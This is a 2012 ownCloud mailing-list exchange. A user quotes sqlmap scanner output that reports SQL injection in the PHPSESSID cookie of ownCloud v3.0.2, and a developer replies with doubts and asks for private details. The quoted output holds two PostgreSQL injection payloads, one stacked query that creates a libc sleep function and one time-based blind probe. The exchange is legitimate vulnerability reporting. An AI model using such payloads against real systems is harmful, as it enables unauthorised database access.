[Owncloud] This is the actual vulnerability?

Frank Karlitschek frank at owncloud.org
Sun May 6 21:30:26 UTC 2012


Hi Saymon,

I´m not sure I understood completely what this output means. It seems to be a problem with the handling of the sessionid which is handled by php itself. So this could be a php problem and not related to owncloud. But we don´t store the session in the database so I don´t fully understand the connection here.

Can you send me all the information you have here and how to reproduce this output in a private email?

Thanks a lot.

Frank


On 06.05.2012, at 12:41, saymon <saymon at hub21.ru> wrote:

> Hi all.
> We decided to check my owncloud different scanners security. When
> testing sqlmap faced with the following:
> 
> sqlmap identified the following injection points with a total of 16640
> HTTP(s) requests:
> ---
> Place: Cookie
> Parameter: PHPSESSID
>    Type: stacked queries
>    Title: PostgreSQL < 8.2 stacked queries (Glibc)
>    Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE
> FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C'
> STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt
> 
>    Type: AND/OR time-based blind
>    Title: PostgreSQL > 8.1 AND time-based blind
>    Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT
> 1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe
> ---
> This is the actual vulnerability? ownCloud v3.0.2
> 
> _______________________________________________
> Owncloud mailing list
> Owncloud at kde.org
> https://mail.kde.org/mailman/listinfo/owncloud




More information about the Owncloud mailing list